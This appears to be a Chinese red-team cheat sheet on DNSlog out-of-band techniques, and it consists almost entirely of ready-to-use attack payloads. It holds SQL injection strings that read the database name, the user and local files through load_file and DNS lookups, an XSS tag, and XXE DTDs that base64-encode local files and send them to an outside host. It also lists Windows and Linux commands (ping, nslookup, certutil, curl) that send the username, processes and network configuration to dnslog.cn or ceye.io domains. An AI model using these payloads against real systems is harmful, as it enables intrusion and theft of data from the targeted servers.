『红蓝对抗』DNSlog 那些事儿

and (select count(*) from mysql.user)>0    /*如果结果返回正常，说明具有读写权限.*/and (select count(*) from mysql.user)>0    /*返回错误，应该是管理员给数据库账户降权了*/

SELECT hex(load_file("C:/Users/goout/Desktop/test1.txt"));    符合限制的，可显示内容；SELECT hex(load_file("C:/Users/goout/Desktop/test2.txt"));    超过限制的，显示NULL

lucy' and (select load_file(concat('//',(select database()),'.cwygpj.dnslog.cn/a')))#

lucy' and (select load_file(concat('//',(select hex(user())),'.cwygpj.dnslog.cn/a')))#

lucy' and (select load_file(concat('//',(select (hex(load_file('C:/phpstudy_pro/WWW/1.txt'))),'.mlsydx.dnslog.cn/a')))#

<img src=http://xss.dmy7xv.dnslog.cn/a alert'123'>

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://xxe.xxx.ceye.io">%remote;]>

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % dtd SYSTEM "http://xx.xx.xx.xx/xxe.dtd"> %dtd;%int;%send; ]> <r></r>

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/phpstudy_pro/WWW/1.txt"><!ENTITY % int "<!ENTITY &#x25; send SYSTEM 'http://xxe.xxxx.ceye.io/?p=%file;'>">

ping %username%.ghumgi.dnslog.cnping %os%.ghumgi.dnslog.cn

for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul

cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.a6sg89.dnslog.cn && nslookup !FINAL!"

//变量                     类型       描述//%ALLUSERSPROFILE%        本地       返回“所有用户”配置文件的位置。//%APPDATA%                本地       返回默认情况下应用程序存储数据的位置。//%CD%                     本地       返回当前目录字符串。//%CMDCMDLINE%             本地       返回用来启动当前的 Cmd.exe 的准确命令行。//%CMDEXTVERSION%          系统       返回当前的“命令处理程序扩展”的版本号。//%COMPUTERNAME%           系统       返回计算机的名称。//%COMSPEC%                系统       返回命令行解释器可执行程序的准确路径。//%DATE%                   系统       返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息，请参阅 Date。//%ERRORLEVEL%             系统       返回上一条命令的错误代码。通常用非零值表示错误。//%HOMEDRIVE%              系统       返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。//%HOMEPATH%               系统       返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。//%HOMESHARE%              系统       返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。//%LOGONSERVER%            本地       返回验证当前登录会话的域控制器的名称。//%NUMBER_OF_PROCESSORS%   系统       指定安装在计算机上的处理器的数目。//%OS%                     系统       返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。//%PATH%                   系统       指定可执行文件的搜索路径。//%PATHEXT%                系统       返回操作系统认为可执行的文件扩展名的列表。//%PROCESSOR_ARCHITECTURE% 系统       返回处理器的芯片体系结构。值：x86 或 IA64（基于 Itanium）。//%PROCESSOR_IDENTFIER%    系统       返回处理器说明。//%PROCESSOR_LEVEL%        系统       返回计算机上安装的处理器的型号。//%PROCESSOR_REVISION%     系统       返回处理器的版本号。//%PROMPT%                 本地       返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。//%RANDOM%                 系统       返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。//%SYSTEMDRIVE%            系统       返回包含 Windows server operating system 根目录（即系统根目录）的驱动器。//%SYSTEMROOT%             系统       返回 Windows server operating system 根目录的位置。//%TEMP%和%TMP%            系统和用户  返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP，而其他应用程序则需要 TMP。//%TIME%                   系统       返回当前时间。使用与time /t命令相同的格式。由Cmd.exe生成。有关time命令的详细信息，请参阅 Time。//%USERDOMAIN%             本地       返回包含用户帐户的域的名称。//%USERNAME%               本地       返回当前登录的用户的名称。//%USERPROFILE%            本地       返回当前用户的配置文件的位置。//%WINDIR%                 系统       返回操作系统目录的位置。

curl `whoami`.xxxx.ceye.iocurl `id`.xxxx.ceye.iocurl -X POST http://xxxx.ceye.io/ -d `ifconfig|base64 -w 0`    ipconfig以base64编码显示
等等......